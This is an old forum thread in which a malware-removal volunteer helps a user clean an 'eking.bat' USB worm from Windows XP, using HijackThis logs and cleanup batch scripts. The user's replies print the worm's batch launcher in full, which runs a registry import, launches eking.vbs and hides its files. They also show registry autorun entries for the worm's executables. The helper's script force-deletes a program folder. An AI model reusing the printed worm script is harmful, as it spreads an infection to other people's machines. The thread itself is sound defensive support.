Infected With An Unkown Virus/malware Called Eking.bat

Forum Guidelines

Read this topic before posting a log.

DO NOT post a ComboFix log unless requested to.

Only members of the HijackThis Team or Moderators are allowed to help people with logs. Anyone else should refrain from posting to another user's log.

When posting a log please put the type of infection you have in the topic title. IE: Winfixer, Virtumonde, WinTools, WebSearch, Home Search Assistant, etc.

Do not bump your topic. We try to resolve logs on a first come/first served basis. By bumping your log you will be pushed back in line due to the new date of your bump.

Infected With An Unkown Virus/malware Called Eking.bat, Don't know how to remove it

Options

TooYoungForYa View Member Profile	May 1 2008, 02:33 AM Post #1
New Member Group: Members Posts: 7 Joined: 1-May 08 Member No.: 206,410	Logfile of Trend Micro HijackThis v2.0.2 Scan saved at 3:12:33 PM, on 5/1/2008 Platform: Windows XP SP2 (WinNT 5.01.2600) MSIE: Internet Explorer v7.00 (7.00.6000.16574) Boot mode: Normal Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\system32\spoolsv.exe C:\WINDOWS\system32\nvsvc32.exe C:\WINDOWS\System32\svchost.exe C:\Program Files\UPHClean\uphclean.exe C:\WINDOWS\Explorer.EXE C:\WINDOWS\system32\VTTimer.exe C:\WINDOWS\system32\carpserv.exe C:\WINDOWS\system32\ctfmon.exe C:\WINDOWS\System32\svchost.exe C:\Program Files\Mozilla Firefox\firefox.exe D:\pnp\mirc.exe C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\avp.exe C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\avp.exe C:\Program Files\Trend Micro\HijackThis\HijackThis.exe R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.yahoo.com R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://us.rd.yahoo.com/customize/ie/defaul...rch/search.html R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896 R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.yahoo.com R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://us.rd.yahoo.com/customize/ycomp/def...//www.yahoo.com R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Windows Internet Explorer provided by Yahoo! R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn0\yt.dll F2 - REG:system.ini: UserInit=userinit.exe,eking.bat O2 - BHO: Yahoo! Toolbar Helper - {02478D38-C3F9-4EFB-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn0\yt.dll O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file) O3 - Toolbar: Easy-WebPrint - {327C2873-E90D-4c37-AA9D-10AC9BABA46C} - C:\Program Files\Canon\Easy-WebPrint\Toolband.dll O3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn0\yt.dll O4 - HKLM\..\Run: [VTTimer] VTTimer.exe O4 - HKLM\..\Run: [VTTrayp] VTtrayp.exe O4 - HKLM\..\Run: [CARPService] carpserv.exe O4 - HKLM\..\Run: [AVP] "C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\avp.exe" O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe O8 - Extra context menu item: &Download with &DAP - C:\Program Files\DAP Premium\dapextie.htm O8 - Extra context menu item: &Search - http://edits.mywebsearch.com/toolbaredits/...?p=ZRYYYYYYYYPH O8 - Extra context menu item: Download &all with DAP - C:\Program Files\DAP Premium\dapextie2.htm O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000 O8 - Extra context menu item: Easy-WebPrint Add To Print List - res://C:\Program Files\Canon\Easy-WebPrint\Resource.dll/RC_AddToList.html O8 - Extra context menu item: Easy-WebPrint High Speed Print - res://C:\Program Files\Canon\Easy-WebPrint\Resource.dll/RC_HSPrint.html O8 - Extra context menu item: Easy-WebPrint Preview - res://C:\Program Files\Canon\Easy-WebPrint\Resource.dll/RC_Preview.html O8 - Extra context menu item: Easy-WebPrint Print - res://C:\Program Files\Canon\Easy-WebPrint\Resource.dll/RC_Print.html O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll O9 - Extra button: Web Anti-Virus statistics - {1F460357-8A94-4D71-9CA3-AA4ACF32ED8E} - C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\SCIEPlgn.dll O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe O9 - Extra button: Yahoo! Messenger - {E5D12C4E-7B4F-11D3-B5C9-0050045C3C96} - C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe O9 - Extra 'Tools' menuitem: Yahoo! Messenger - {E5D12C4E-7B4F-11D3-B5C9-0050045C3C96} - C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll O16 - DPF: Yahoo! Pool 2 - http://download.games.yahoo.com/games/clients/y/potf_x.cab O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=39204 O16 - DPF: {A90A5822-F108-45AD-8482-9BC8B12DD539} (Crucial cpcScan) - http://www.crucial.com/controls/cpcScanner.cab O16 - DPF: {B38870E4-7ECB-40DA-8C6A-595F0A5519FF} (MsnMessengerSetupDownloadControl Class) - http://messenger.msn.com/download/MsnMesse...pDownloader.cab O16 - DPF: {C3F79A2B-B9B4-4A66-B012-3EE46475B072} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/Messe...nt.cab56907.cab O23 - Service: Kaspersky Anti-Virus 7.0 (AVP) - Kaspersky Lab - C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\avp.exe O23 - Service: Boonty Games - BOONTY - C:\Program Files\Common Files\BOONTY Shared\Service\Boonty.exe O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe O23 - Service: ServiceLayer - Nokia. - C:\Program Files\Common Files\PCSuite\Services\ServiceLayer.exe -- End of file - 6787 bytes

ndmmxiaomayi View Member Profile	May 3 2008, 03:12 AM Post #2
Member Group: HJT Team Posts: 146 Joined: 23-July 06 From: Little Red Dot Member No.: 77,489	Hi, Welcome to Bleeping Computer. I'm researching your log now and will get back to you in a moment. Thank you for your patience. -------------------- 狂风暴雨烈日海啸不曾让我停下，也不曾把我打倒。

ndmmxiaomayi View Member Profile	May 3 2008, 03:48 AM Post #3
Member Group: HJT Team Posts: 146 Joined: 23-July 06 From: Little Red Dot Member No.: 77,489	Hi, Step 1 Open HijackThis. Click on the Open the Misc Tools section button. Look under System tools. Click on the Open Uninstall Manager... button. Click on the Save list... button. It will prompt you to save. Save this log in a convenient location. By default it's named uninstall_list.txt. Notepad will open. Please post this log in your next reply. Step 2 Download FileFind.zip by Atribune and save it to your desktop. Locate the FileFind.zip that you've downloaded earlier. Right click on FileFind.zip and select Extract All.... Click Next on seeing the Welcome to the Compressed (zipped) Folders Extraction Wizard. Click on the Browse button. Click on Desktop. Then click OK. Once done, check (tick) the Show extracted files box and click Finish. Double click on FileFind.exe to run it. Enter eking.bat into the File: box. Click on the Search button. After a while a list of file locations will appear in the List of Files: box. Click on the Export button. This will create a Notepad file named Export.txt located in C drive. Please copy and paste it to your next reply. In your next reply, please post: Uninstall list (uninstall_list.txt) Results of FileFind (C:\Export.txt) A new HijackThis log -------------------- 狂风暴雨烈日海啸不曾让我停下，也不曾把我打倒。

TooYoungForYa View Member Profile	May 7 2008, 07:50 AM Post #4
New Member Group: Members Posts: 7 Joined: 1-May 08 Member No.: 206,410	Sorry for the delayed rep I was busy on school, anyway here is it Attached File(s) Export.txt ( 69bytes ) Number of downloads: 10 uninstall_list.txt ( 7.42k ) Number of downloads: 7 hijackthis.log ( 6.63k ) Number of downloads: 5

ndmmxiaomayi View Member Profile	May 7 2008, 10:04 AM Post #5
Member Group: HJT Team Posts: 146 Joined: 23-July 06 From: Little Red Dot Member No.: 77,489	Hi, Step 1 Please open HijackThis and select Do a system scan only. Put a check (tick) next to this line: F2 - REG:system.ini: UserInit=userinit.exe,eking.bat Click Fix checked. Close HijackThis. Step 2 Please open Notepad and copy and paste the following in the Code box into Notepad: CODE @echo off echo The log can be found at C:\check.txt if Notepad doesn't open automatically. sc config "Boonty Games" start= disabled sc stop "Boonty Games" sc delete "Boonty Games" rmdir /s /q "C:\Program Files\Common Files\BOONTY Shared" echo Checking if Boonty folder is still present... >> C:\check.txt dir "C:\Program Files\Common Files\BOONTY Shared" >> C:\check.txt echo. >> C:\check.txt echo Contents of C:\eking.bat >> C:\check.txt echo. >> C:\check.txt type C:\eking.bat >> C:\check.txt echo. >> C:\check.txt echo Contents of C:\WINDOWS\system32\eking.bat >> C:\check.txt echo. >> C:\check.txt type C:\WINDOWS\system32\eking.bat >> C:\check.txt notepad C:\check.txt Click on File > Save As.... In the File Name box, copy and paste in del.bat In the Save As Type box, select All Files from the drop-down list. Click Save. Double click on del.bat to run it. Command Prompt will open, followed by Notepad shortly afterwards. Please post the contents of this Notepad file in your next reply. Step 3 Please download Deckard's System Scanner from Tech Support Forum and save it to your desktop. Note: You must be logged onto an account with administrator privileges. Save all your work and close all opened programs. Double click on dss.exe to run it. Follow the prompts. When the scan is complete, two log files will be produced. The first one, main.txt, will be maximized, the second one, extra.txt, will be minimized. Please post the contents of the 2 log files in your next reply. 1 log per reply please. In your next reply, please post: The 2 DSS reports Contents of Notepad file from Step 2 -------------------- 狂风暴雨烈日海啸不曾让我停下，也不曾把我打倒。

TooYoungForYa View Member Profile	May 10 2008, 09:45 AM Post #6
New Member Group: Members Posts: 7 Joined: 1-May 08 Member No.: 206,410	Here is the log for step 2 as for step 3 It keeps not responding when it says "Examining Registry" I waited for how many hours but it isn't loading at all, its stuck with "Examining Registry". Checking if Boonty folder is still present... Volume in drive C has no label. Volume Serial Number is 9858-C650 Directory of C:\Program Files\Common Files Contents of C:\eking.bat @echo off if exist .\eking.reg regedit /s .\eking.reg if not "%1"=="" goto open if exist eking.vbs start WScript.exe eking.vbs&exit if exist %SYSTEMROOT%\system32\eking.vbs start WScript.exe %SYSTEMROOT%\system32\eking.vbs&exit exit :open if not "%1"=="Open" goto next start explorer .\ exit :next if "%1"=="+" attrib +s +a +h +r %2\eking.* if "%1"=="+" attrib +s +a +h +r %2\autorun.inf :end Contents of C:\WINDOWS\system32\eking.bat @echo off if exist .\eking.reg regedit /s .\eking.reg if not "%1"=="" goto open if exist start wscript.exe eking.vbs&exit if exist s start wscript.exe %systemroot%\system32\eking.vbs&exit exit :open if not "%1"=="Open" goto next start explorer .\ exit :next if "%1"=="+" attrib +s +a +h +r %2\eking.* if "%1"=="+" attrib +s +a +h +r %2\autorun.inf :end

ndmmxiaomayi View Member Profile	May 11 2008, 11:33 AM Post #7
Member Group: HJT Team Posts: 146 Joined: 23-July 06 From: Little Red Dot Member No.: 77,489	Hi, Please see this topic to disable Kapsersky Antivirus temporarily. http://www.bleepingcomputer.com/forums/topic114351.html Then try running DSS again. If it doesn't work, please let me know. -------------------- 狂风暴雨烈日海啸不曾让我停下，也不曾把我打倒。

TooYoungForYa View Member Profile	May 12 2008, 10:36 PM Post #8
New Member Group: Members Posts: 7 Joined: 1-May 08 Member No.: 206,410	It still hangs in examining registry I've followed exactly the instructions on how to disable kaspersky and also I tried to end the process of it still the programs doesnt respond properly

ndmmxiaomayi View Member Profile	May 13 2008, 12:46 AM Post #9
Member Group: HJT Team Posts: 146 Joined: 23-July 06 From: Little Red Dot Member No.: 77,489	Let's see if another tool works. Make sure that Kaspersky is disabled temporarily before you run it. Please download OTScanIt.exe from Bleeping Computer by OldTimer and save it to your desktop. Double click on OTScanIt.exe to run it. Click on Extract. Once done, you will be prompted. Click OK and click Close. Double click on the OTScanIt folder. Double click on OTScanIt.exe to run it. Under Basic Scans section, use these settings: Processes - Non-Microsoft Services - Non-Microsoft Drivers - Non-Microsoft Rootkit Search - Yes Files Created Within - 90 days Files Modified Within - 90 days Under Additional Scans section, use these settings: Reg - BotCheck Reg - Disabled MS Config Items Reg - File Associations Reg - MountPoints2 Reg - Safeboot Options Reg - Security Settings Reg - Software Policy Settings Reg - Uninstall List Evnt - EventViewer Errors/Warnings (last 7 days) Click on the Run Scan button at the top left hand corner. OTScanIt will start running. Once done, Notepad will open. Please post the contents of this Notepad file in your next reply. -------------------- 狂风暴雨烈日海啸不曾让我停下，也不曾把我打倒。

TooYoungForYa View Member Profile	May 13 2008, 09:48 AM Post #10
New Member Group: Members Posts: 7 Joined: 1-May 08 Member No.: 206,410	Here is the notepad. Sorry if I can't post the contents of it because it is too long. Attached File(s) OTScanIt.Txt ( 453.06k ) Number of downloads: 25

ndmmxiaomayi View Member Profile	May 15 2008, 12:30 AM Post #11
Member Group: HJT Team Posts: 146 Joined: 23-July 06 From: Little Red Dot Member No.: 77,489	Hi, Please open Notepad and copy and paste the following in the Code box into Notepad: CODE regedit /e C:\look.txt "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2" start notepad C:\look.txt Click on File > Save As.... In the File Name box, copy and paste in look.bat In the Save As Type box, select All Files from the drop-down list. Click Save. Double click on look.bat to run it. Command Prompt will open, followed by Notepad shortly afterwards. Please post the contents of this Notepad file in your next reply. -------------------- 狂风暴雨烈日海啸不曾让我停下，也不曾把我打倒。

TooYoungForYa View Member Profile	May 15 2008, 09:55 AM Post #12
New Member Group: Members Posts: 7 Joined: 1-May 08 Member No.: 206,410	Windows Registry Editor Version 5.00 [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2] [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\A] "BaseClass"="Drive" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\C] "BaseClass"="Drive" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\D] "BaseClass"="Drive" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\E] "BaseClass"="Drive" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\F] "BaseClass"="Drive" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{070068d8-dd0c-11db-b941-806d6172696f}] "BaseClass"="Drive" "_AutorunStatus"=hex:01,00,01,00,00,01,00,df,df,5f,df,5f,5f,5f,5f,df,df,5f,5f,\ 5f,df,df,df,5f,5f,5f,df,df,df,5f,5f,df,5f,5f,5f,5f,5f,cf,5f,5f,5f,5f,5f,cf,\ cf,5f,5f,5f,5f,cf,cf,cf,cf,cf,df,df,df,5f,df,df,00,5f,5f,5f,5f,5f,5f,5f,5f,\ 5f,5f,00,01,00,00,00,08,00,00,00 [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{158fa6be-96ce-11dc-bc73-00142a84709e}] "BaseClass"="Drive" "_AutorunStatus"=hex:01,00,01,00,00,01,00,df,df,5f,df,5f,5f,5f,5f,df,df,5f,5f,\ 5f,df,df,df,5f,5f,5f,df,df,df,5f,5f,df,5f,5f,5f,5f,5f,01,00,01,01,ee,ff,ff,\ ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,\ ff,ff,00,00,10,00,00,09,02,00,00 [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{158fa6be-96ce-11dc-bc73-00142a84709e}\Shell] @="Auto" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{158fa6be-96ce-11dc-bc73-00142a84709e}\Shell\Auto] [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{158fa6be-96ce-11dc-bc73-00142a84709e}\Shell\Auto\command] @="F:\\sal.xls.exe" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{158fa6be-96ce-11dc-bc73-00142a84709e}\Shell\Autoplay] "MUIVerb"="@shell32.dll,-8504" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{158fa6be-96ce-11dc-bc73-00142a84709e}\Shell\Autoplay\DropTarget] "CLSID"="{f26a669a-bcbb-4e37-abf9-7325da15f931}" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{158fa6be-96ce-11dc-bc73-00142a84709e}\Shell\AutoRun] "Extended"="" @="Auto&Play" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{158fa6be-96ce-11dc-bc73-00142a84709e}\Shell\AutoRun\command] @="C:\\WINDOWS\\system32\\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL sal.xls.exe" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{16c9f784-98b0-11db-8a54-00142a84709e}] "BaseClass"="Drive" "_AutorunStatus"=hex:01,00,01,00,00,01,00,df,df,5f,df,5f,5f,5f,5f,df,df,5f,5f,\ 5f,df,df,df,5f,5f,5f,df,df,df,5f,5f,df,5f,5f,5f,5f,5f,01,00,01,01,ee,ff,ff,\ ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,\ ff,ff,00,01,00,00,00,08,07,00,00 [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{16c9f784-98b0-11db-8a54-00142a84709e}\shell] @="None" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{16c9f784-98b0-11db-8a54-00142a84709e}\shell\Autoplay] "MUIVerb"="@shell32.dll,-8504" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{16c9f784-98b0-11db-8a54-00142a84709e}\shell\Autoplay\DropTarget] "CLSID"="{f26a669a-bcbb-4e37-abf9-7325da15f931}" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{1d037028-2b71-11db-88b2-00142a84709e}] "BaseClass"="Drive" "_AutorunStatus"=hex:01,00,01,00,00,01,00,df,df,5f,df,5f,5f,5f,5f,df,df,5f,5f,\ 5f,df,df,df,5f,5f,5f,df,df,df,5f,5f,df,5f,5f,5f,5f,5f,00,5f,5f,5f,5f,5f,cf,\ cf,5f,5f,5f,5f,01,01,00,ee,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,\ ff,ff,00,00,10,00,00,08,02,00,00 [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{1d037028-2b71-11db-88b2-00142a84709e}\shell] @="None" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{1d037028-2b71-11db-88b2-00142a84709e}\shell\Autoplay] "MUIVerb"="@shell32.dll,-8504" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{1d037028-2b71-11db-88b2-00142a84709e}\shell\Autoplay\DropTarget] "CLSID"="{f26a669a-bcbb-4e37-abf9-7325da15f931}" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{5e32a9f3-6cb5-11dc-bb82-00142a84709e}] "BaseClass"="Drive" "_AutorunStatus"=hex:01,00,01,00,00,01,00,df,df,5f,df,5f,5f,5f,5f,df,df,5f,5f,\ 5f,df,df,df,5f,5f,5f,df,df,df,5f,5f,5f,df,df,df,5f,5f,5f,df,df,df,5f,5f,df,\ 5f,5f,5f,5f,5f,01,00,01,01,ee,5f,cf,cf,5f,5f,5f,5f,cf,cf,cf,cf,cf,cf,cf,cf,\ 5f,cf,cf,cf,5f,5f,5f,5f,5f,5f,5f,5f,5f,5f,00,00,10,00,00,08,07,00,00 [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{5e32a9f3-6cb5-11dc-bb82-00142a84709e}\Shell] @="Open" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{5e32a9f3-6cb5-11dc-bb82-00142a84709e}\Shell\Autoplay] "MUIVerb"="@shell32.dll,-8504" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{5e32a9f3-6cb5-11dc-bb82-00142a84709e}\Shell\Autoplay\DropTarget] "CLSID"="{f26a669a-bcbb-4e37-abf9-7325da15f931}" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{5e32a9f3-6cb5-11dc-bb82-00142a84709e}\Shell\AutoRun] "Extended"="" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{5e32a9f3-6cb5-11dc-bb82-00142a84709e}\Shell\AutoRun\command] @="F:\\" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{5e32a9f3-6cb5-11dc-bb82-00142a84709e}\Shell\explore] @="explore" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{5e32a9f3-6cb5-11dc-bb82-00142a84709e}\Shell\explore\Command] @="WScript.exe .\\eking.vbs" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{5e32a9f3-6cb5-11dc-bb82-00142a84709e}\Shell\open] @="Open" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{5e32a9f3-6cb5-11dc-bb82-00142a84709e}\Shell\open\Command] @="WScript.exe .\\eking.vbs" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{5e32a9f3-6cb5-11dc-bb82-00142a84709e}\Shell\open\Default] @="1" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{5e32a9f3-6cb5-11dc-bb82-00142a84709e}\_Autorun] [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{5e32a9f3-6cb5-11dc-bb82-00142a84709e}\_Autorun\DefaultIcon] @="F:\\icon\\ako.ico" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{5e32a9f4-6cb5-11dc-bb82-00142a84709e}] "BaseClass"="Drive" "_AutorunStatus"=hex:01,00,01,00,00,01,00,df,df,5f,df,5f,5f,5f,5f,df,df,5f,5f,\ 5f,df,df,df,5f,5f,5f,df,df,df,5f,5f,5f,df,df,df,5f,5f,5f,df,df,df,5f,5f,df,\ 5f,5f,5f,5f,5f,cf,5f,5f,5f,5f,5f,cf,cf,5f,5f,5f,5f,cf,cf,cf,cf,cf,cf,cf,cf,\ 5f,cf,cf,cf,5f,5f,5f,5f,5f,5f,5f,5f,5f,5f,00,00,10,00,00,00,00,00,00 [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{5e32a9f4-6cb5-11dc-bb82-00142a84709e}\shell] @="None" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{5e32a9f4-6cb5-11dc-bb82-00142a84709e}\shell\Autoplay] "MUIVerb"="@shell32.dll,-8504" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{5e32a9f4-6cb5-11dc-bb82-00142a84709e}\shell\Autoplay\DropTarget] "CLSID"="{f26a669a-bcbb-4e37-abf9-7325da15f931}" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{5e32a9f5-6cb5-11dc-bb82-00142a84709e}] "BaseClass"="Drive" "_AutorunStatus"=hex:01,00,01,00,00,01,00,df,df,5f,df,5f,5f,5f,5f,df,df,5f,5f,\ 5f,df,df,df,5f,5f,5f,df,df,df,5f,5f,5f,df,df,df,5f,5f,5f,df,df,df,5f,5f,df,\ 5f,5f,5f,5f,5f,cf,5f,5f,5f,5f,5f,cf,cf,5f,5f,5f,5f,cf,cf,cf,cf,cf,cf,cf,cf,\ 5f,cf,cf,cf,5f,5f,5f,5f,5f,5f,5f,5f,5f,5f,00,00,10,00,00,00,00,00,00 [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{5e32a9f5-6cb5-11dc-bb82-00142a84709e}\shell] @="None" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{5e32a9f5-6cb5-11dc-bb82-00142a84709e}\shell\Autoplay] "MUIVerb"="@shell32.dll,-8504" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{5e32a9f5-6cb5-11dc-bb82-00142a84709e}\shell\Autoplay\DropTarget] "CLSID"="{f26a669a-bcbb-4e37-abf9-7325da15f931}" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{5e32a9f6-6cb5-11dc-bb82-00142a84709e}] "BaseClass"="Drive" "_AutorunStatus"=hex:01,00,01,00,00,01,00,df,df,5f,df,5f,5f,5f,5f,df,df,5f,5f,\ 5f,df,df,df,5f,5f,5f,df,df,df,5f,5f,5f,df,df,df,5f,5f,5f,df,df,df,5f,5f,df,\ 5f,5f,5f,5f,5f,cf,5f,5f,5f,5f,5f,cf,cf,5f,5f,5f,5f,cf,cf,cf,cf,cf,cf,cf,cf,\ 5f,cf,cf,cf,5f,5f,5f,5f,5f,5f,5f,5f,5f,5f,00,00,10,00,00,00,00,00,00 [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{5e32a9f6-6cb5-11dc-bb82-00142a84709e}\shell] @="None" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{5e32a9f6-6cb5-11dc-bb82-00142a84709e}\shell\Autoplay] "MUIVerb"="@shell32.dll,-8504" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{5e32a9f6-6cb5-11dc-bb82-00142a84709e}\shell\Autoplay\DropTarget] "CLSID"="{f26a669a-bcbb-4e37-abf9-7325da15f931}" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{9620ae1e-d2f8-11dc-bd66-00142a84709e}] "BaseClass"="Drive" "_AutorunStatus"=hex:01,00,01,00,00,01,00,df,df,5f,df,5f,5f,5f,5f,df,df,5f,5f,\ 5f,df,df,df,5f,5f,5f,df,df,df,5f,5f,5f,df,df,df,5f,5f,5f,df,df,df,5f,5f,df,\ 5f,5f,5f,5f,5f,cf,5f,5f,5f,5f,5f,cf,cf,5f,5f,5f,5f,cf,cf,cf,cf,cf,01,01,01,\ ee,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,00,00,10,00,00,08,00,00,00 [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{9620ae1e-d2f8-11dc-bd66-00142a84709e}\Shell] @="Open" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{9620ae1e-d2f8-11dc-bd66-00142a84709e}\Shell\AutoRun] "Extended"="" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{9620ae1e-d2f8-11dc-bd66-00142a84709e}\Shell\AutoRun\command] @="tmf3w3g0.com" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{9620ae1e-d2f8-11dc-bd66-00142a84709e}\Shell\explore] [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{9620ae1e-d2f8-11dc-bd66-00142a84709e}\Shell\explore\Command] @="tmf3w3g0.com" 